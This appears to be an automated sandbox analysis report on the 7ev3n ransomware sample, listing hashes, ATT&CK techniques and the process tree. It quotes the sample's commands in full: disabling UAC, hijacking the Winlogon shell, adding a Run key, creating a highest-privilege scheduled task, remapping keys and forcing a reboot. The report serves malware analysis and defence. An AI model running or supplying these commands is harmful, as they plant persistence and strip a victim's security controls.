f1bbcc5c678d174d858ae089f4494e3ea8bcfc418098d61804a15e437f08aff7

Target

Endermanch@7ev3n.exe
Size

315KB
MD5

9f8bc96c96d43ecb69f883388d228754
SHA1

61ed25a706afa2f6684bb4d64f69c5fb29d20953
SHA256

7d373ccb96d1dbb1856ef31afa87c2112a0c1795a796ab01cb154700288afec5
SHA512

550a891c1059f58aa983138caf65a7ea9c326cb1b94c15f3e7594128f6e9f1295b9c2dbc0925637dba7c94e938083fffc6a63dc7c2e5b1e247679931cce505c6

Score

10^/10

bootkit evasion persistence ransomware trojan

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe"	reg.exe

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Executes dropped EXE 1 IoCs

Processes:

system.exe

pid process

2532 system.exe
Modifies WinLogon to allow AutoLogon 2 TTPs 1 IoCs
Enables rebooting of the machine without requiring login credentials.
ransomware bootkit

Winlogon Helper DLL
T1004

Modify Registry
T1112

Processes:

LogonUI.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked LogonUI.exe

pid	process
2532	system.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked	LogonUI.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe"	reg.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

SCHTASKS.exe

pid process

208 SCHTASKS.exe

pid	process
208	SCHTASKS.exe

Modifies Control Panel 2 IoCs

evasion

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\Accessibility\StickyKeys	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\Accessibility\StickyKeys\Flags = "506"	reg.exe

Modifies data under HKEY_USERS 15 IoCs

Processes:

LogonUI.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

wlrmdr.exe

pid process

2740 wlrmdr.exe
2740 wlrmdr.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

shutdown.exe

description pid process

Token: SeShutdownPrivilege 3028 shutdown.exe
Token: SeRemoteShutdownPrivilege 3028 shutdown.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

wlrmdr.exeLogonUI.exe

pid process

2740 wlrmdr.exe
3856 LogonUI.exe

pid	process
2740	wlrmdr.exe
2740	wlrmdr.exe

description	pid	process
Token: SeShutdownPrivilege	3028	shutdown.exe
Token: SeRemoteShutdownPrivilege	3028	shutdown.exe

pid	process
2740	wlrmdr.exe
3856	LogonUI.exe

Suspicious use of WriteProcessMemory 57 IoCs

Processes:

Endermanch@7ev3n.exesystem.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 744 wrote to memory of 2532	744	Endermanch@7ev3n.exe	system.exe
PID 744 wrote to memory of 2532	744	Endermanch@7ev3n.exe	system.exe
PID 744 wrote to memory of 2532	744	Endermanch@7ev3n.exe	system.exe
PID 2532 wrote to memory of 1320	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 1320	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 1320	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 208	2532	system.exe	SCHTASKS.exe
PID 2532 wrote to memory of 208	2532	system.exe	SCHTASKS.exe
PID 2532 wrote to memory of 208	2532	system.exe	SCHTASKS.exe
PID 2532 wrote to memory of 1492	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 1492	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 1492	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 1200	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 1200	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 1200	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 3928	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 3928	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 3928	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 3604	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 3604	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 3604	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 3508	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 3508	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 3508	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 2168	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 2168	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 2168	2532	system.exe	cmd.exe
PID 2168 wrote to memory of 3148	2168	cmd.exe	reg.exe
PID 2168 wrote to memory of 3148	2168	cmd.exe	reg.exe
PID 2168 wrote to memory of 3148	2168	cmd.exe	reg.exe
PID 1492 wrote to memory of 3164	1492	cmd.exe	reg.exe
PID 1492 wrote to memory of 3164	1492	cmd.exe	reg.exe
PID 1492 wrote to memory of 3164	1492	cmd.exe	reg.exe
PID 1200 wrote to memory of 3736	1200	cmd.exe	reg.exe
PID 1200 wrote to memory of 3736	1200	cmd.exe	reg.exe
PID 1200 wrote to memory of 3736	1200	cmd.exe	reg.exe
PID 3604 wrote to memory of 3176	3604	cmd.exe	reg.exe
PID 3604 wrote to memory of 3176	3604	cmd.exe	reg.exe
PID 3604 wrote to memory of 3176	3604	cmd.exe	reg.exe
PID 3508 wrote to memory of 496	3508	cmd.exe	reg.exe
PID 3508 wrote to memory of 496	3508	cmd.exe	reg.exe
PID 3508 wrote to memory of 496	3508	cmd.exe	reg.exe
PID 3928 wrote to memory of 3840	3928	cmd.exe	reg.exe
PID 3928 wrote to memory of 3840	3928	cmd.exe	reg.exe
PID 3928 wrote to memory of 3840	3928	cmd.exe	reg.exe
PID 2532 wrote to memory of 2296	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 2296	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 2296	2532	system.exe	cmd.exe
PID 2296 wrote to memory of 3384	2296	cmd.exe	reg.exe
PID 2296 wrote to memory of 3384	2296	cmd.exe	reg.exe
PID 2296 wrote to memory of 3384	2296	cmd.exe	reg.exe
PID 2532 wrote to memory of 3692	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 3692	2532	system.exe	cmd.exe
PID 2532 wrote to memory of 3692	2532	system.exe	cmd.exe
PID 3692 wrote to memory of 3028	3692	cmd.exe	shutdown.exe
PID 3692 wrote to memory of 3028	3692	cmd.exe	shutdown.exe
PID 3692 wrote to memory of 3028	3692	cmd.exe	shutdown.exe

C:\Users\Admin\AppData\Local\Temp\Endermanch@7ev3n.exe
"C:\Users\Admin\AppData\Local\Temp\Endermanch@7ev3n.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:744

C:\Users\Admin\AppData\Local\system.exe
"C:\Users\Admin\AppData\Local\system.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2532

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
3⤵
PID:1320

C:\Windows\SysWOW64\SCHTASKS.exe
C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:208

C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
3⤵
- Suspicious use of WriteProcessMemory
PID:1492

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
4⤵
- Modifies WinLogon for persistence
PID:3164

C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
3⤵
- Suspicious use of WriteProcessMemory
PID:1200

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
4⤵
- Adds Run key to start application
PID:3736

C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
3⤵
- Suspicious use of WriteProcessMemory
PID:3928

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
4⤵
PID:3840

C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
3⤵
- Suspicious use of WriteProcessMemory
PID:3604

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
4⤵
- Modifies Control Panel
PID:3176

C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
3⤵
- Suspicious use of WriteProcessMemory
PID:3508

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
4⤵
PID:496

C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
3⤵
- Suspicious use of WriteProcessMemory
PID:2168

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
4⤵
PID:3148

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
3⤵
- Suspicious use of WriteProcessMemory
PID:2296

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
4⤵
PID:3384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f
3⤵
- Suspicious use of WriteProcessMemory
PID:3692

C:\Windows\SysWOW64\shutdown.exe
shutdown -r -t 10 -f
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3028

C:\Windows\system32\wlrmdr.exe
-s -1 -f 2 -t You're about to be signed out -m Windows will shut down in less than a minute. -a 3
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2740

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3ad3855 /state1:0x41c64e6d
1⤵
- Modifies WinLogon to allow AutoLogon
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:3856

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Winlogon Helper DLL

T1004

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\del.bat
MD5
dda69d69d2bf9994650f6c0df260fd80

SHA1
94041b483a3b0cda19339bddf09f1bd1b2242fea

SHA256
a2126c0c0b9d7401a20582ada62be413320cebb86dff164e5cb91bec7b6aa898

SHA512
7e70d053cd60110011844a699eba9a25065cdb2827fd72f379a67f479eb2ddc346223c39e3c2781dc16b8e07915737aba513b5eae57d38e88d46eae318a579ac

Download Submit
C:\Users\Admin\AppData\Local\system.exe
MD5
4a42fda5a4ddcd7efb4bc9b2b3a078ad

SHA1
bda8e5e2b826a0ca962ffdf68b9873786b842367

SHA256
2b6beee78d86145985d69f9a9ec862b96b777901489e5eac564565a7cc0be42c

SHA512
044f277f273cd0b9e07ff661c976e30744bfb10a10a528a8837d848583a7903093bcccbf8c5233695e4db0e2e488732f08a72cb452fdb0cfa90476515da80e30

Download Submit
C:\Users\Admin\AppData\Local\system.exe
MD5
4a42fda5a4ddcd7efb4bc9b2b3a078ad

SHA1
bda8e5e2b826a0ca962ffdf68b9873786b842367

SHA256
2b6beee78d86145985d69f9a9ec862b96b777901489e5eac564565a7cc0be42c

SHA512
044f277f273cd0b9e07ff661c976e30744bfb10a10a528a8837d848583a7903093bcccbf8c5233695e4db0e2e488732f08a72cb452fdb0cfa90476515da80e30

Download Submit
memory/208-6-0x0000000000000000-mapping.dmp

Download
memory/496-18-0x0000000000000000-mapping.dmp

Download
memory/1200-9-0x0000000000000000-mapping.dmp

Download
memory/1320-5-0x0000000000000000-mapping.dmp

Download
memory/1492-8-0x0000000000000000-mapping.dmp

Download
memory/2168-13-0x0000000000000000-mapping.dmp

Download
memory/2296-20-0x0000000000000000-mapping.dmp

Download
memory/2532-2-0x0000000000000000-mapping.dmp

Download
memory/3028-23-0x0000000000000000-mapping.dmp

Download
memory/3148-14-0x0000000000000000-mapping.dmp

Download
memory/3164-15-0x0000000000000000-mapping.dmp

Download
memory/3176-17-0x0000000000000000-mapping.dmp

Download
memory/3384-21-0x0000000000000000-mapping.dmp

Download
memory/3508-12-0x0000000000000000-mapping.dmp

Download
memory/3604-11-0x0000000000000000-mapping.dmp

Download
memory/3692-22-0x0000000000000000-mapping.dmp

Download
memory/3736-16-0x0000000000000000-mapping.dmp

Download
memory/3840-19-0x0000000000000000-mapping.dmp

Download
memory/3928-10-0x0000000000000000-mapping.dmp

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads